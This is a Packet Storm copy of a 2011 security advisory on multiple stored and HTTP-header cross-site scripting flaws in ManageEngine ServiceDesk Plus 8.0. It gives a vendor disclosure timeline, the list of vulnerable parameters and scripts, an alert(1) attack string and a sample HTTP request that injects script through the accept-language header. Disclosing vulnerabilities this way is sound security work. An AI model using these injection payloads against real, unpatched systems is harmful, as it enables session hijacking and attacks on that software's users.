exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine ServiceDesk Plus 8.0 Cross Site Scripting

ManageEngine ServiceDesk Plus 8.0 Cross Site Scripting
Posted Aug 23, 2011
Authored by LiquidWorm | Site zeroscience.mk

ManageEngine ServiceDesk Plus version 8.0 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | c5e4aace24eeb232523198e9b9fbf7a3b8bc002a0ecc544c0dcfc4d68c940c72

ManageEngine ServiceDesk Plus 8.0 Cross Site Scripting

Change Mirror Download

ManageEngine ServiceDesk Plus 8.0 Multiple Stored XSS Vulnerabilities


Vendor: Zoho Corporation Pvt. Ltd.
Product web page: http://www.manageengine.com
Affected version: 8.0.0 Build 8013 (Enterprise)

Summary: ServiceDesk Plus integrates your help desk requests
and assets to help you manage your IT effectively. It helps
you implement ITIL best practices and troubleshoot IT service
requests faster. ServiceDesk Plus is a highly customizable,
easy-to-implement help desk software.

Desc: The application suffers from multiple stored XSS
vulnerabilities. Input thru several parameters is not
sanitized allowing the attacker to execute HTML code
into user's browser session on the affected site. Also,
couple of HTTP header elements are vulnerable to XSS.

Tested on: Microsoft Windows XP Professional SP3 (English)
Apache-Coyote/1.1
Java Servlet 2.4
Tomcat-5.0.28/JBoss-3.2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk


Vendor status:

[23.07.2011] Vulnerabilities discovered.
[26.07.2011] Vendor contacted.
[26.07.2011] Vendor replies asking more details.
[26.07.2011] Sent vulnerability details to vendor.
[26.07.2011] Vendor confirms XSS issues assigning Issue ID: SD-39838.
[01.08.2011] Requested status update from vendor.
[02.08.2011] Vendor replies.
[03.08.2011] Working with the vendor.
[08.08.2011] Asked vendor for scheduled patch release date.
[08.08.2011] Vendor replies.
[09.08.2011] Working with the vendor.
[16.08.2011] Vendor releases build 8015 to address these issues.
[23.08.2011] Public security advisory released.



Advisory ID: ZSL-2011-5039
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5039.php

Vendor Advisory: http://www.manageengine.com/products/service-desk/readme-8.0.html#8.7


23.07.2011


----


Stored XSS (post-auth):

Param: reqName (POST)
Scripts: WorkOrder.do, Problems.cc, AddNewProblem.cc, ChangeDetails.cc (http://localhost:8080/common/UpdateField.jsp)

Params: reqName, description, level, priority, category, title, attach (POST)
Script: WorkOrder.do

Params: keywords, comments (POST)
Script: AddSolution.do

Params: supportDetails, contractName, comments (POST)
Script: ContractDef.do

Param: organizationName (POST)
Script: VendorDef.do

Param: COMMENTS (POST)
Script: MarkUnavailability.jsp (MySchedule.do)


Attack string: "><script>alert(1)</script>

--


HTTP Header XSS:

Elements: referer, accept-language
Scripts: HomePage.do, MySchedule.do, WorkOrder.do

------------
GET /HomePage.do HTTP/1.0
Accept: */*
User-Agent: joxy-poxy
Host: localhost:8080
Cookie: JSESSIONID=AD4D28ADDB611A3DE6EAC2C6B4C8808E;JSESSIONIDSSO=B1F6034451E9457EEEF3DA09BA424247
Connection: Close
accept-language: 1<script>alert(1)</script>
Pragma: no-cache
------------
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close